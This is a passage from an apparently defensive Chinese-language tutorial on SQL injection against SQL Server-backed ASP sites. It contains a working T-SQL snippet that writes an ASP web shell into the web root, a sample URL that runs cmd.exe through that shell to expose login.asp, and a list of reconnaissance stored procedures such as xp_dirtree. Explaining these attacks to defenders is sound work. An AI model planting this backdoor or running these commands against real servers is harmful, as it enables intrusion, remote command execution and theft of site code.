| 对象,并利用 SP_OAMETHOD 呼叫 “wscript.shell” 对象的 run 方法,以执行操作系统命令接口工具程序 cmd.exe,将 login.asp 输出到 test.txt 档案中,这时骇客只要在网页上输入 http://.../.../test.txt 就可以看到 login.asp 写作的方式,作为下一步侵入的基本信息。
当然,骇客也可以利用 Scripting.FileSystemObject 对象来建立一个 ASP 网页后门,语法如程序代码列表 4 所示:
DECLARE @fs int,@fi int EXEC SP_OACREATE ''''Scripting.FileSystemObject'''',@fs OUTPUT EXEC SP_OAMETHOD @fs,''''CreateTextFile'''',@fs OUTPUT,''''C:\InetPub\WWWRoot\SQLInject\Shell.asp'''',1 EXEC SP_OAMETHOD @fs,''''WriteLine'''',null,''''<% Set objShell=Server.CreateObject("WScript.Shell") : objShell.Run Request("cmd") %>''''
程序代码列表 4:建立 ASP 后门网页。
从此透过 URL 就可以执行任何执行文件,范例如下:
http://localhost/sqlinject/shell.asp?cmd=C:\WINNT\system32\cmd.exe /c type c:\inetpub\wwwroot\sqlinject\login.asp > c:\inetpub\wwwroot\sqlinject\test.txt
其它相关的延伸预存程序
这一类的延伸预存程序,你可能要小心的还有:
延伸预存程序的名称
用途
使用范例
xp_availablemedia
显示系统上可用的磁盘驱动器,如 C:\。
xp_availablemedia
xp_dirtree
显示某个目录下的子目录与档案架构。
xp_dirtree ''''c:\inetpub\wwwroot\''''
<< 上一页 [11] [12] [13] [14] [15] [16] [17] 下一页 |